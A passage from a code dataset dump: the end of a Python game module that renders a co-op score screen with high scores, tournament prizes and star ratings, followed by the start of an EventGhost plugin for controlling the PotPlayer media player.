len(self._playerinfos)\n if p_count > 1:\n h_offs_extra -= 40\n if self._score_type != 'points':\n h_offs_extra += 60\n if p_count == 2:\n scale = 0.9\n elif p_count == 3:\n scale = 0.65\n elif p_count == 4:\n scale = 0.5\n\n # Make sure there's at least 10.\n while len(self._show_info['tops']) < 10:\n self._show_info['tops'].append([0, '-'])\n\n times: List[Tuple[float, float]] = []\n for i in range(len(self._show_info['tops'])):\n times.insert(\n random.randrange(0,\n len(times) + 1),\n (base_delay + i * 0.05, base_delay + 0.4 + i * 0.05))\n for i, tval in enumerate(self._show_info['tops']):\n score = int(tval[0])\n name_str = tval[1]\n if self._name_str == name_str and self._score == score:\n flash = True\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = base_delay + 1.0\n tdelay2 = base_delay + 1.0\n else:\n flash = False\n if self._name_str == name_str:\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.9, 1.0, 0.9, 1.0)\n else:\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = times[i][0]\n tdelay2 = times[i][1]\n\n if name_str != '-':\n Text(str(score) if self._score_type == 'points' else\n ba.timestring(\n score * 10,\n timeformat=ba.TimeFormat.MILLISECONDS),\n position=(ts_h_offs + 20 + h_offs_extra,\n ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs + 11.0),\n h_align=Text.HAlign.RIGHT,\n v_align=Text.VAlign.CENTER,\n color=color0,\n flash=flash,\n transition=Text.Transition.IN_LEFT,\n transition_delay=tdelay1).autoretain()\n Text(ba.Lstr(value=name_str),\n position=(ts_h_offs + 35 + h_offs_extra,\n ts_height / 2 + -ts_height * (i + 1) / 10 +\n v_offs_names + v_offs + 11.0),\n maxwidth=80.0 + 100.0 * len(self._playerinfos),\n v_align=Text.VAlign.CENTER,\n color=color1,\n flash=flash,\n scale=scale,\n transition=Text.Transition.IN_LEFT,\n transition_delay=tdelay2).autoretain()\n\n def _show_tips(self) -> None:\n from bastd.actor.tipstext import TipsText\n TipsText(offs_y=30).autoretain()\n\n def _update_tournament_time_remaining_text(self) -> None:\n if self._tournament_time_remaining is None:\n return\n self._tournament_time_remaining = max(\n 0, self._tournament_time_remaining - 1)\n if self._tournament_time_remaining_text is not None:\n val = ba.timestring(self._tournament_time_remaining,\n suppress_format_warning=True,\n centi=False)\n self._tournament_time_remaining_text.node.text = val\n\n def _show_world_rank(self, offs_x: float) -> None:\n # FIXME: Tidy this up.\n # pylint: disable=too-many-locals\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-statements\n from ba.internal import get_tournament_prize_strings\n assert self._show_info is not None\n available = (self._show_info['results'] is not None)\n\n if available:\n error = (self._show_info['results']['error']\n if 'error' in self._show_info['results'] else None)\n rank = self._show_info['results']['rank']\n total = self._show_info['results']['total']\n rating = (10.0 if total == 1 else 10.0 * (1.0 - (float(rank - 1) /\n (total - 1))))\n player_rank = self._show_info['results']['playerRank']\n best_player_rank = self._show_info['results']['bestPlayerRank']\n else:\n error = False\n rating = None\n player_rank = None\n best_player_rank = None\n\n # If we've got tournament-seconds-remaining, show it.\n if self._tournament_time_remaining is not None:\n Text(ba.Lstr(resource='coopSelectWindow.timeRemainingText'),\n position=(-360, -70 - 100),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.8,\n maxwidth=300,\n transition_delay=2.0).autoretain()\n self._tournament_time_remaining_text = Text(\n '',\n position=(-360, -110 - 100),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=1.6,\n maxwidth=150,\n transition_delay=2.0)\n\n # If we're a tournament, show prizes.\n try:\n tournament_id = self.session.tournament_id\n if tournament_id is not None:\n if tournament_id in ba.app.tournament_info:\n tourney_info = ba.app.tournament_info[tournament_id]\n # pylint: disable=unbalanced-tuple-unpacking\n pr1, pv1, pr2, pv2, pr3, pv3 = (\n get_tournament_prize_strings(tourney_info))\n # pylint: enable=unbalanced-tuple-unpacking\n Text(ba.Lstr(resource='coopSelectWindow.prizesText'),\n position=(-360, -70 + 77),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=1.0,\n maxwidth=300,\n transition_delay=2.0).autoretain()\n vval = -107 + 70\n for rng, val in ((pr1, pv1), (pr2, pv2), (pr3, pv3)):\n Text(rng,\n position=(-410 + 10, vval),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.RIGHT,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.6,\n maxwidth=300,\n transition_delay=2.0).autoretain()\n Text(val,\n position=(-390 + 10, vval),\n color=(0.7, 0.7, 0.7, 1.0),\n h_align=Text.HAlign.LEFT,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.8,\n maxwidth=300,\n transition_delay=2.0).autoretain()\n vval -= 35\n except Exception:\n ba.print_exception('Error showing prize ranges.')\n\n if self._do_new_rating:\n if error:\n ZoomText(ba.Lstr(resource='failText'),\n flash=True,\n trail=True,\n scale=1.0 if available else 0.333,\n tilt_translate=0.11,\n h_align='center',\n position=(190 + offs_x, -60),\n maxwidth=200,\n jitter=1.0).autoretain()\n Text(ba.Lstr(translate=('serverResponses', error)),\n position=(0, -140),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.9,\n maxwidth=400,\n transition_delay=1.0).autoretain()\n else:\n ZoomText((('#' + str(player_rank)) if player_rank is not None\n else ba.Lstr(resource='unavailableText')),\n flash=True,\n trail=True,\n scale=1.0 if available else 0.333,\n tilt_translate=0.11,\n h_align='center',\n position=(190 + offs_x, -60),\n maxwidth=200,\n jitter=1.0).autoretain()\n\n Text(ba.Lstr(value='${A}:',\n subs=[('${A}', ba.Lstr(resource='rankText'))]),\n position=(0, 36),\n maxwidth=300,\n transition=Text.Transition.FADE_IN,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition_delay=0).autoretain()\n if best_player_rank is not None:\n Text(ba.Lstr(resource='currentStandingText',\n fallback_resource='bestRankText',\n subs=[('${RANK}', str(best_player_rank))]),\n position=(0, -155),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.7,\n transition_delay=1.0).autoretain()\n else:\n ZoomText((f'{rating:.1f}' if available else ba.Lstr(\n resource='unavailableText')),\n flash=True,\n trail=True,\n scale=0.6 if available else 0.333,\n tilt_translate=0.11,\n h_align='center',\n position=(190 + offs_x, -94),\n maxwidth=200,\n jitter=1.0).autoretain()\n\n if available:\n if rating >= 9.5:\n stars = 3\n elif rating >= 7.5:\n stars = 2\n elif rating > 0.0:\n stars = 1\n else:\n stars = 0\n star_tex = ba.gettexture('star')\n star_x = 135 + offs_x\n for _i in range(stars):\n img = ba.NodeActor(\n ba.newnode('image',\n attrs={\n 'texture': star_tex,\n 'position': (star_x, -16),\n 'scale': (62, 62),\n 'opacity': 1.0,\n 'color': (2.2, 1.2, 0.3),\n 'absolute_scale': True\n })).autoretain()\n\n assert img.node\n ba.animate(img.node, 'opacity', {0.15: 0, 0.4: 1})\n star_x += 60\n for _i in range(3 - stars):\n img = ba.NodeActor(\n ba.newnode('image',\n attrs={\n 'texture': star_tex,\n 'position': (star_x, -16),\n 'scale': (62, 62),\n 'opacity': 1.0,\n 'color': (0.3, 0.3, 0.3),\n 'absolute_scale': True\n })).autoretain()\n assert img.node\n ba.animate(img.node, 'opacity', {0.15: 0, 0.4: 1})\n star_x += 60\n\n def dostar(count: int, xval: float, offs_y: float,\n score: str) -> None:\n Text(score + ' =',\n position=(xval, -64 + offs_y),\n color=(0.6, 0.6, 0.6, 0.6),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.4,\n transition_delay=1.0).autoretain()\n stx = xval + 20\n for _i2 in range(count):\n img2 = ba.NodeActor(\n ba.newnode('image',\n attrs={\n 'texture': star_tex,\n 'position': (stx, -64 + offs_y),\n 'scale': (12, 12),\n 'opacity': 0.7,\n 'color': (2.2, 1.2, 0.3),\n 'absolute_scale': True\n })).autoretain()\n assert img2.node\n ba.animate(img2.node, 'opacity', {1.0: 0.0, 1.5: 0.5})\n stx += 13.0\n\n dostar(1, -44 - 30, -112, '0.0')\n dostar(2, 10 - 30, -112, '7.5')\n dostar(3, 77 - 30, -112, '9.5')\n try:\n best_rank = self._campaign.getlevel(self._level_name).rating\n except Exception:\n best_rank = 0.0\n\n if available:\n Text(ba.Lstr(\n resource='outOfText',\n subs=[('${RANK}',\n str(int(self._show_info['results']['rank']))),\n ('${ALL}', str(self._show_info['results']['total']))\n ]),\n position=(0, -155 if self._newly_complete else -145),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.55,\n transition_delay=1.0).autoretain()\n\n new_best = (best_rank > self._old_best_rank and best_rank > 0.0)\n was_string = ba.Lstr(value=' ${A}',\n subs=[('${A}',\n ba.Lstr(resource='scoreWasText')),\n ('${COUNT}', str(self._old_best_rank))])\n if not self._newly_complete:\n Text(ba.Lstr(value='${A}${B}',\n subs=[('${A}',\n ba.Lstr(resource='newPersonalBestText')),\n ('${B}', was_string)]) if new_best else\n ba.Lstr(resource='bestRatingText',\n subs=[('${RATING}', str(best_rank))]),\n position=(0, -165),\n color=(1, 1, 1, 0.7),\n flash=new_best,\n h_align=Text.HAlign.CENTER,\n transition=(Text.Transition.IN_RIGHT\n if new_best else Text.Transition.FADE_IN),\n scale=0.5,\n transition_delay=1.0).autoretain()\n\n Text(ba.Lstr(value='${A}:',\n subs=[('${A}', ba.Lstr(resource='ratingText'))]),\n position=(0, 36),\n maxwidth=300,\n transition=Text.Transition.FADE_IN,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition_delay=0).autoretain()\n\n ba.timer(0.35, ba.Call(ba.playsound, self._score_display_sound))\n if not error:\n ba.timer(0.35, ba.Call(ba.playsound, self.cymbal_sound))\n\n def _show_fail(self) -> None:\n ZoomText(ba.Lstr(resource='failText'),\n maxwidth=300,\n flash=False,\n trail=True,\n h_align='center',\n tilt_translate=0.11,\n position=(0, 40),\n jitter=1.0).autoretain()\n if self._fail_message is not None:\n Text(self._fail_message,\n h_align=Text.HAlign.CENTER,\n position=(0, -130),\n maxwidth=300,\n color=(1, 1, 1, 0.5),\n transition=Text.Transition.FADE_IN,\n transition_delay=1.0).autoretain()\n ba.timer(0.35, ba.Call(ba.playsound, self._score_display_sound))\n\n def _show_score_val(self, offs_x: float) -> None:\n assert self._score_type is not None\n assert self._score is not None\n ZoomText((str(self._score) if self._score_type == 'points' else\n ba.timestring(self._score * 10,\n timeformat=ba.TimeFormat.MILLISECONDS)),\n maxwidth=300,\n flash=True,\n trail=True,\n scale=1.0 if self._score_type == 'points' else 0.6,\n h_align='center',\n tilt_translate=0.11,\n position=(190 + offs_x, 115),\n jitter=1.0).autoretain()\n Text(ba.Lstr(\n value='${A}:', subs=[('${A}', ba.Lstr(\n resource='finalScoreText'))]) if self._score_type == 'points'\n else ba.Lstr(value='${A}:',\n subs=[('${A}', ba.Lstr(resource='finalTimeText'))]),\n maxwidth=300,\n position=(0, 200),\n transition=Text.Transition.FADE_IN,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition_delay=0).autoretain()\n ba.timer(0.35, ba.Call(ba.playsound, self._score_display_sound))\n","sub_path":"assets/src/ba_data/python/bastd/activity/coopscore.py","file_name":"coopscore.py","file_ext":"py","file_size_in_byte":65480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"260594927","text":"# -*- coding: utf-8 -*-\n#\n# plugins/PotPlayer/__init__.py\n#\n# Copyright (C) 2013 Pako\n#\n# This file is a plugin for EventGhost.\n# Copyright (C) 2005-2013 Lars-Peter Voss \n#\n# EventGhost is free software; you can redistribute it and/or modify it under\n# the terms of the GNU General Public License version 2 as published by the\n# Free Software Foundation;\n#\n# EventGhost is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR\n# A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n \n# Changelog (in reverse chronological order):\n# -------------------------------------------\n# 0.3 by Pako 2013-12-09 08:31 UTC+1\n# - bugfix (speed control) wrong command ID\n# 0.2 by Pako 2013-11-09 12:31 UTC+1\n# - bugfix (action add/play) when filename contains non-ascii characters too\n# 0.1 by Pako 2013-11-02 13:43 UTC+1\n# - support URL (EventGhost forum) added\n# - add/play file renamed to add/play file/folder\n# 0.0 by Pako 2013-10-22 13:12 UTC+1\n# - initial version\n\neg.RegisterPlugin(\n name = \"PotPlayer\",\n author = \"Pako\",\n version = \"0.3\",\n kind = \"program\",\n guid = \"{F711529C-FE41-4DC7-906D-8D44FF3D62C1}\",\n createMacrosOnAdd = True,\n description = (\n 'Adds actions to control '\n 'PotPlayer.'\n ),\n icon = (\n \"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAByElEQVR42mN0Svz8nwE/\"\n \"eADEB4B44b75vAfQJRlBBvBwMTIoyzGhSDx99ZPh2etfDCxM7AxMjMwwYZABgUCDPqAY\"\n \"oK/BzNBXxonV+hsPvjHsPPqbYf3ufwzMTKwgoQtA7AgzhKAByAa1z/rG8OQFB9gQoAGG\"\n \"JBnw6fNnhuu3HjPUzxJl+P0brDYRaMgCrAZMWPSTwcaIhcFEB+L3Hz9+MDx8/ISBhZmZ\"\n \"4ehlFoaFGwXhrsBqQMecH2BaXJiJwc4Y6My/zxhYWFgY2NjZGH7/YWGIrWIEhwfQAEas\"\n \"BpT3fUdxvqz4b4Yoz79gA9jZ2BhiKr8yvHnHgtsA56QvcDY3UDglmJHB3YaVgRXoCiYm\"\n \"JgavzLcMP3+yYxrw5etXhnfv3jMk1guANUd6AiPdhYVBgJ8N6GRIOvn89S+Db/YnVC/o\"\n \"qjIyVCR9Zfj16xcDG9CJk5ZzMaSFMDPISLCC/Y4Mthz6wtC/AJKogAY4gg3QUPjDUJP2\"\n \"A6iZnYEd6k+QRkZGRhTNINvDSz6AnY8SjdrK/xla8hiAGtkZWFkh/sSWkLrmAqPzKRtm\"\n \"QtJTY2LoKeVgYGbGrpFgUiYhM22AOh01MzHgBw8Y8GRnALMj2BGuN2wjAAAAAElFTkSu\"\n \"QmCC\"\n ),\n url = \"http://www.eventghost.net/forum/viewtopic.php?f=9&t=5738\"\n)\n#===============================================================================\n\nimport eg\nimport wx\nimport _winreg\nfrom os import environ\nfrom os.path import join, exists, isfile, isdir, split\nfrom subprocess import Popen\nfrom eg.WinApi import SendMessageTimeout, WM_COMMAND\nfrom eg.WinApi.Utils import GetMonitorDimensions\nfrom eg.WinApi.Dynamic import PostMessage\nfrom eg.WinApi.Dynamic import CreateEvent, SetEvent\nfrom threading import Timer\nfrom win32gui import GetSubMenu, GetMenuItemCount, GetDlgCtrlID \nfrom win32gui import GetClassName, GetWindowText\nfrom win32gui import SendMessage, FindWindow, IsWindow, GetWindow\nfrom copy import deepcopy as cpy\nfrom time import sleep\nfrom winsound import PlaySound, SND_ASYNC\nfrom ctypes import addressof, c_int, c_buffer\nfrom ctypes import create_string_buffer\nfrom ctypes import byref, sizeof, c_long, c_ulong, Structure\nfrom ctypes.wintypes import WinDLL\n_user32 = WinDLL(\"user32\")\nimport wx.grid as gridlib\nfrom sys import getfilesystemencoding\nFSE = getfilesystemencoding()\nfrom eg.Classes.MainFrame.TreeCtrl import DropTarget as EventDropTarget\n\nARIAL_INFO = \"0;-35;0;0;0;700;0;0;0;0;3;2;1;34;Arial\"\n\nWM_INITMENUPOPUP = 0x0117\nMF_GRAYED = 1\nMF_DISABLED = 2\nMF_CHECKED = 8\nMF_BYPOSITION = 1024\nMF_SEPARATOR = 2048\nSYS_VSCROLL_X = wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X)\nSYS_HSCROLL_Y = wx.SystemSettings.GetMetric(wx.SYS_HSCROLL_Y)\narialInfoString = \"0;-35;0;0;0;700;0;0;0;0;3;2;1;34;Arial\"\nGW_CHILD = 5\nGW_HWNDNEXT = 2\nBN_CLICKED = 0\nWM_SETTEXT = 12\nWM_CLOSE = 16\nEM_GETLINE = 196\nWM_CONTEXTMENU = 0x007B\nOBJID_CLIENT = 0xFFFFFFFC\nMENUsubst = {\n 10059:\"5 Sec.\",\n 10060:\"5 Sec.\",\n 10061:\"30 Sec.\",\n 10062:\"30 Sec.\",\n 10063:\"1 Min.\",\n 10064:\"1 Min.\",\n 10065:\"5 Min.\",\n 10066:\"5 Min.\",\n 10579:\"X Sec.\",\n 10580:\"X Sec.\",\n 10140:\"X Sec.\",\n 10141:\"X Sec.\",\n 10291:\"X Sec.\",\n 10292:\"X Sec.\",\n 10479:\"